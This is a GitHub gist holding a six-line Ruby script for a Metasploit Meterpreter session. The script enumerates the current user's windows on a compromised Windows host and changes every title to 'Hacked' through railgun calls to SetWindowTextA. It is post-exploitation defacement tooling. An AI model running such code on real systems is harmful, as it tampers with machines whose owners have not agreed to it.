Created
December 20, 2013 05:03
-
-
Save mubix/8050592 to your computer and use it in GitHub Desktop.
Sets all of the windows titles for the current user to "Hacked"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
windows = client.extapi.window.enumerate | |
windows.each do |winder| | |
if winder[:title] != 'Default IME' | |
result = client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked") | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment